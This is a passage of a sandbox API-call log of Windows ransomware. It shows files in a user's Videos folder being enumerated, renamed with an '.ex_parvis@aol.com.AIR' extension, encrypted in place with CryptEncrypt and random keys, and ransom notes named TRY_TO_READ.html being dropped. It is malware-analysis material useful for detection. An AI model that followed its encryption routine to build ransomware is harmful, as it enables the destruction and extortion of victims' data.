ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978a8af0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978a8af0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e518 [0161.219] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978a8af0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978a8af0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.219] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58e57870, ftCreationTime.dwHighDateTime=0x1d4ce0c, ftLastAccessTime.dwLowDateTime=0x1432aac0, ftLastAccessTime.dwHighDateTime=0x1d4d43f, ftLastWriteTime.dwLowDateTime=0x1432aac0, ftLastWriteTime.dwHighDateTime=0x1d4d43f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4n2w9OY8gpEd9N", cAlternateFileName="4N2W9O~1")) returned 1 [0161.219] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.223] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaf3d050, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0x2d4db70, ftLastAccessTime.dwHighDateTime=0x1d4ce65, ftLastWriteTime.dwLowDateTime=0x2d4db70, ftLastWriteTime.dwHighDateTime=0x1d4ce65, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B 7S0G0p 7", cAlternateFileName="B7S0G0~1")) returned 1 [0161.223] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c46100, ftCreationTime.dwHighDateTime=0x1d4ce5c, ftLastAccessTime.dwLowDateTime=0xf6490f50, ftLastAccessTime.dwHighDateTime=0x1d4c8c6, ftLastWriteTime.dwLowDateTime=0xf6490f50, ftLastWriteTime.dwHighDateTime=0x1d4c8c6, nFileSizeHigh=0x0, nFileSizeLow=0x265d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G jsWwGmPLHB4.swf", cAlternateFileName="GJSWWG~1.SWF")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbde9ba0, ftCreationTime.dwHighDateTime=0x1d4c9e9, ftLastAccessTime.dwLowDateTime=0xd076f5a0, ftLastAccessTime.dwHighDateTime=0x1d4cb7b, ftLastWriteTime.dwLowDateTime=0xd076f5a0, ftLastWriteTime.dwHighDateTime=0x1d4cb7b, nFileSizeHigh=0x0, nFileSizeLow=0x15800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ih0JFE3_JSpz.swf", cAlternateFileName="IH0JFE~1.SWF")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf929d9e0, ftCreationTime.dwHighDateTime=0x1d4cc70, ftLastAccessTime.dwLowDateTime=0x5a7e3290, ftLastAccessTime.dwHighDateTime=0x1d4d27a, ftLastWriteTime.dwLowDateTime=0x5a7e3290, ftLastWriteTime.dwHighDateTime=0x1d4d27a, nFileSizeHigh=0x0, nFileSizeLow=0x12d42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n8_GmKdZEnm.avi", cAlternateFileName="N8_GMK~1.AVI")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8820f970, ftCreationTime.dwHighDateTime=0x1d4d1c2, ftLastAccessTime.dwLowDateTime=0xb008be20, ftLastAccessTime.dwHighDateTime=0x1d4cb67, ftLastWriteTime.dwLowDateTime=0xb008be20, ftLastWriteTime.dwHighDateTime=0x1d4cb67, nFileSizeHigh=0x0, nFileSizeLow=0xbe9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OzLs-mmP0D.avi", cAlternateFileName="OZLS-M~1.AVI")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978a8af0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978a8af0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb149ca50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.225] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb49b4800, ftCreationTime.dwHighDateTime=0x1d4ccfb, ftLastAccessTime.dwLowDateTime=0x848bcb90, ftLastAccessTime.dwHighDateTime=0x1d4d150, ftLastWriteTime.dwLowDateTime=0x848bcb90, ftLastWriteTime.dwHighDateTime=0x1d4d150, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xPbKSJ8BjlvGUnNyjM", cAlternateFileName="XPBKSJ~1")) returned 1 [0161.225] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xPbKSJ8BjlvGUnNyjM\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xpbksj8bjlvgunnyjm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.227] FindNextFileW (in: hFindFile=0x35e518, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb49b4800, ftCreationTime.dwHighDateTime=0x1d4ccfb, ftLastAccessTime.dwLowDateTime=0x848bcb90, ftLastAccessTime.dwHighDateTime=0x1d4d150, ftLastWriteTime.dwLowDateTime=0x848bcb90, ftLastWriteTime.dwHighDateTime=0x1d4d150, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xPbKSJ8BjlvGUnNyjM", cAlternateFileName="XPBKSJ~1")) returned 0 [0161.227] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.227] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.227] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi", dwFileAttributes=0x80) returned 1 [0161.229] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi") returned 52 [0161.229] GetProcessHeap () returned 0x2e0000 [0161.229] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0161.229] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi" [0161.229] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0161.229] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ozls-mmp0d.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ozls-mmp0d.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.234] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OzLs-mmP0D.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ozls-mmp0d.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.234] GetProcessHeap () returned 0x2e0000 [0161.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.234] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3049) returned 1 [0161.234] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbe9 [0161.234] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.234] GetProcessHeap () returned 0x2e0000 [0161.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.234] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.234] WriteFile (in: hFile=0x4d0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.235] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.235] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.236] ReadFile (in: hFile=0x4d0, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0xbe9, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0xbe9, lpOverlapped=0x0) returned 1 [0161.236] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-3049, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.236] WriteFile (in: hFile=0x4d0, lpBuffer=0x3af410*, nNumberOfBytesToWrite=0xbe9, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesWritten=0x2acf9c8*=0xbe9, lpOverlapped=0x0) returned 1 [0161.237] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.237] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.237] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi", dwFileAttributes=0x80) returned 1 [0161.237] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi") returned 53 [0161.237] GetProcessHeap () returned 0x2e0000 [0161.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0161.237] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi" [0161.237] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0161.237] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n8_gmkdzenm.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n8_gmkdzenm.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.240] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8_GmKdZEnm.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n8_gmkdzenm.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.240] GetProcessHeap () returned 0x2e0000 [0161.240] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.240] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=77122) returned 1 [0161.240] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x12d42 [0161.240] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.240] GetProcessHeap () returned 0x2e0000 [0161.240] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.240] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.240] WriteFile (in: hFile=0x4d0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.241] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.241] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.242] ReadFile (in: hFile=0x4d0, lpBuffer=0x3af410, nNumberOfBytesToRead=0x12d42, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x12d42, lpOverlapped=0x0) returned 1 [0161.244] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-77122, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.244] WriteFile (in: hFile=0x4d0, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x12d42, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x12d42, lpOverlapped=0x0) returned 1 [0161.244] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.245] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.245] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf", dwFileAttributes=0x80) returned 1 [0161.245] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf") returned 54 [0161.245] GetProcessHeap () returned 0x2e0000 [0161.245] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd2) returned 0x319d30 [0161.245] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf" [0161.245] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0161.245] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ih0jfe3_jspz.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ih0jfe3_jspz.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.248] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ih0JFE3_JSpz.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ih0jfe3_jspz.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.248] GetProcessHeap () returned 0x2e0000 [0161.248] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.248] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=88064) returned 1 [0161.248] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15800 [0161.248] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.248] GetProcessHeap () returned 0x2e0000 [0161.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.248] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.248] WriteFile (in: hFile=0x4d0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.249] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.249] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.249] ReadFile (in: hFile=0x4d0, lpBuffer=0x3af410, nNumberOfBytesToRead=0x15800, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x15800, lpOverlapped=0x0) returned 1 [0161.250] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-88064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.250] WriteFile (in: hFile=0x4d0, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x15800, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x15800, lpOverlapped=0x0) returned 1 [0161.252] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.252] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.252] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf", dwFileAttributes=0x80) returned 1 [0161.252] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf") returned 55 [0161.252] GetProcessHeap () returned 0x2e0000 [0161.252] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.252] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf" [0161.252] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0161.252] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g jswwgmplhb4.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g jswwgmplhb4.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.254] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G jsWwGmPLHB4.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g jswwgmplhb4.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.254] GetProcessHeap () returned 0x2e0000 [0161.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.254] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9821) returned 1 [0161.255] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x265d [0161.255] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 